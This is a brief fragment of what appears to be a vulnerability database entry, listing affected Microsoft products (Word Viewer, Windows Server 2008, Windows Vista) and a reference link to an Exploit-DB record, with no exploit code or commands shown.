      Microsoft>>Word_viewer >> Version -

      Microsoft>>Windows_server_2008 >> Version -

      Microsoft>>Windows_vista >> Version -

      References

      http://www.exploit-db.com/exploits/30011
      Tags : exploit, x_refsource_EXPLOIT-DB